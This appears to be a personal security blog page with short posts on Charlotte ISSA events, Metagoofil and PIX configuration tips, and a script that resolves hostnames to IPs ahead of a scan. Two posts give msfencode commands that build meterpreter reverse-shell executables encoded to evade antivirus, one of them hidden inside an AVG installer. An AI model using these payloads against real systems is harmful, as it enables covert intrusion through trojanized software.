Dr. Eric Cole will be presenting July 20th at the ITC building in Charlotte for Charlotte ISSA

Dr. Eric Cole, Ryan Linn, and JP Dunning are scheduled to speak on July 20th at the ITC building (200 N. College, Charlotte, 28202). This will be a half-day event starting at 9:00am and running a little past lunch.

For more information check out the Charlotte ISSA site.

Metasploit now has a Screenshot feature. Pretty cool.

Check out the screen-shot feature from Metasploit.

Myrtle Beach Techno Security Conference is free to Charlotte ISSA members

For those Charlotte ISSA members who attended the 2010 ISSA Summit in April: remember that the Myrtle Beach Techno Security Conference is free. That is a $1495 value, for free. I am going to try and go but I do not think my schedule will permit. The dates for this event are June 6th to the 9th. You can register for the event by emailing the following:

Registration:
Contact us at sh-admin@securityhorizon.com
or call 719-488-4500.

Download the registration form at http://www.securityhorizon.com/ISAM-Reg.pdf

TFTP script for PIX firewalls to a Linux box

Yeah, I hate to say it, but we are TFTPing our backup configs to a TFTP server even though we use ssh to log into that server. Sometimes I just hate the Cisco IOS, or maybe I am too stupid to figure out how to scp these suckers from there. Anyhow, if anyone is still TFTPing, here is a basic script to touch the file so you can write it to the server. Probably just need to update the IOS. :)


Metagoofil - "Command extract not found, please check and change the location."

If you get "Command extract not found, please check and change the location" when trying to use Metagoofil, the script is looking for the extract binary at a hard-coded path. Do the following:

# which extract
Mine came back with:
/usr/bin/extract

So I now edit the script:
# nano metagoofil.py

Comment out extcommand='/opt/local/bin/extract' and add the location that which returned. It should look like this:

#extcommand='/opt/local/bin/extract'
extcommand='/usr/bin/extract'

Msfencode to bypass anti-virus

My little research has determined that 2 anti-virus solutions are worthy of detecting or protecting you against Metasploit payloads etc. This research has determined that Sophos and Microsoft Security Essentials are the only worthy engines for this type of attack. On some of the uploads to VirusTotal, DrWeb also found the file to be bad.

So here is what I typed on my Ubuntu system. You have to have Metasploit installed.

windows/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=9090 R | msfencode -t exe -e x86/shikata_ga_nai -c 1 -o bad.exe

Metasploit Tutorial 1

This tutorial is for educational purposes only. I know there are a lot of good tutorials out there, but I am creating my own as a quick reference. Irongeek.com and offensive-security.com have some great video tutorials. This is just a quick reference using meterpreter.

windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=8888 R | msfencode -x /home/kod/avg_free_stb_all_9_114_cnet.exe  -t exe -e x86/shikata_ga_nai -c 10 -o evilfile.exe


Simple Bash Script for obtaining IP addresses versus computer names

Situation: A user gave me computer names, but I need the IP addresses for over 300 machines so I can scan them.

Finished result below (domainnames.txt holds one computer name per line in the first column; the resolved addresses are appended to ipsout.txt):
*******************************
#!/bin/bash
var="-c 1"
# One ping per name. The "bytes of data" header line holds the resolved
# address in parentheses; strip the parentheses and the trailing colon.
for i in $(awk '{print $1}' domainnames.txt); do
  ping "$i" $var | grep data | awk '{print $3}' | sed 's/[():]//g' >> ipsout.txt
done
**************************************************
Explanation below

The -c 1 gets you a single ping when running in a Linux environment or from cygwin in Windows. Note that a name that does not resolve produces no line at all, so the output file has fewer lines than the input and you cannot tell which name is missing.
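An added example (not the original post's script) that does the same name-to-IP job but keeps each name beside its address and records the names that did not resolve; ip_from_ping handles both the Linux "PING name (ip) ..." header and the Windows/cygwin "Pinging name [ip] ..." header. The pinger argument is an assumed hook so the resolver command can be swapped; the default uses GNU ping flags.

```shell
#!/bin/sh
# Added example: resolve computer names to IPv4 addresses via ping, keeping
# name and address on the same line and logging failures instead of dropping them.

# Extract the dotted-quad from ping's header line. Accepts the Linux form
# "PING name (10.0.0.5) 56(84) bytes of data." and the Windows/cygwin form
# "Pinging name [10.0.0.5] with 32 bytes of data:". Prints nothing on no match.
# (IPv4 only: the pattern requires four dotted numbers, so "56(84)" cannot match.)
ip_from_ping() {
  printf '%s\n' "$1" |
    sed -n 's/.*[[(]\([0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*\)[])].*/\1/p' |
    head -n 1
}

# Default resolver: one ping with a one-second timeout (GNU ping flags; an
# assumption, Windows ping uses "-n 1 -w 1000" instead). Only the header matters.
ping_once() {
  ping -c 1 -W 1 "$1" 2>/dev/null | head -n 1
}

# resolve_names NAMES_FILE OUT_FILE FAILED_FILE [PINGER]
# NAMES_FILE: first column is the hostname (same layout as domainnames.txt).
# OUT_FILE receives "name ip" lines; FAILED_FILE receives names that did not resolve.
resolve_names() {
  names=$1; out=$2; failed=$3; pinger=${4:-ping_once}
  : > "$out"; : > "$failed"
  awk 'NF { print $1 }' "$names" | while IFS= read -r name; do
    ip=$(ip_from_ping "$("$pinger" "$name")")
    if [ -n "$ip" ]; then
      printf '%s %s\n' "$name" "$ip" >> "$out"
    else
      printf '%s\n' "$name" >> "$failed"
    fi
  done
}
```

Run it as `resolve_names domainnames.txt ipsout.txt unresolved.txt`; the failed file is the list of names to chase down before the scan.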

New car break-in method

This was sent to me from a friend. Please take note: criminals are using your technology to their advantage through uncommon methods. This is not your typical phishing or social engineering attack. They are applying the Aurora and Zeus methods of slowly gathering information for a greater monetary loss.

Port NATing with Cisco PIX

#static (dmz,outside) tcp 1.2.3.4 www 172.16.1.80 8080 netmask 255.255.255.255 0 500

This maps port 80 (www) on the outside address 1.2.3.4 to port 8080 on the DMZ host 172.16.1.80, so a client connecting to 1.2.3.4 on port 80 reaches the DMZ box listening on 8080. The trailing 0 and 500 are the maximum connections (0 = unlimited) and embryonic connection limit for the translation. Note that the static only creates the translation; inbound traffic from outside to the DMZ still has to be permitted by an access-list applied to the outside interface.